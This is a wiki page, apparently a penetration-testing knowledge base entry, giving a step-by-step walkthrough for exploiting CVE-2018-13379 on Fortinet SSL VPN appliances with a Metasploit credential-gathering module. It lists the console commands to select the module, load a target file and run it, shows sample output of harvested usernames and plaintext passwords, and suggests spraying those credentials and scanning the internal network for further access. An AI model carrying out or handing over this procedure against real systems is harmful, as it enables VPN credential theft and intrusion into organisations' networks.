Fortinet SSL VPN Path Traversal: Difference between revisions
Jump to navigation
Jump to search
mNo edit summary |
|||
Line 5: | Line 5: | ||
* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | * Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | ||
To exploit CVE-2018-13379 we'll use metasploit | To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us. | ||
Start the database and run it: | Start the database and run it: | ||
* sudo systemctl start postgresql | * sudo systemctl start postgresql |
Revision as of 09:17, 5 July 2023
Exploiting CVE-2018-13379 Forti SSL VPN
Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:
- Look for Bookmarks in the VPN console which have internal address and credentials already saved
- Connect to the Forti VPN client locally (Windows server via RDP) and scan the LAN for systems and then spray the VPN credentials as explained here
- Scan the LAN for vulnerabilities which we can exploit to gain further access into the network
To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us. Start the database and run it:
- sudo systemctl start postgresql
- msfdb init
Start msfconsole:
user@host:~$ msfconsole StArting the Metasploit Framework console...
Search for and use the module for CVE-2018-13379:
msf6 > search CVE-2018-13379 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/fortios_vpnssl_traversal_creds_leak normal No FortiOS Path Traversal Credential Gatherer Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
msf6 > use 0 msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
Set your targets:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt RHOSTS => file:targets.txt
Run the exploit module!
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run [*] https://10.10.10.11:10443 - Trying to connect. [+] https://10.10.10.11:10443 - Vulnerable!
View the credentials:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 10.10.10.11 10.10.10.11 10443/tcp (https) admin 8401327 Password 10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password 10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password 10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password 10.10.10.15 10.10.10.15 10443/tcp (https) hvac Winter2022 Password